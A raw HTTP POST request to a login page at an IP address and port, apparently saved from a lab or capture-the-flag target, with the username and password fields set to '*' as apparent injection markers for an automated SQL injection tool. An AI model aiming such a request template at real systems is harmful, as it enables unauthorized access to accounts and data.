POST /index.php HTTP/1.1
Host: 139.59.176.158:31683
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://139.59.176.158:31683
Connection: close
Referer: http://139.59.176.158:31683/index.php
Cookie: PHPSESSID=tfr0f5td72egip6c37mhj5d6bs; uid=74
Upgrade-Insecure-Requests: 1

username=*&password=*
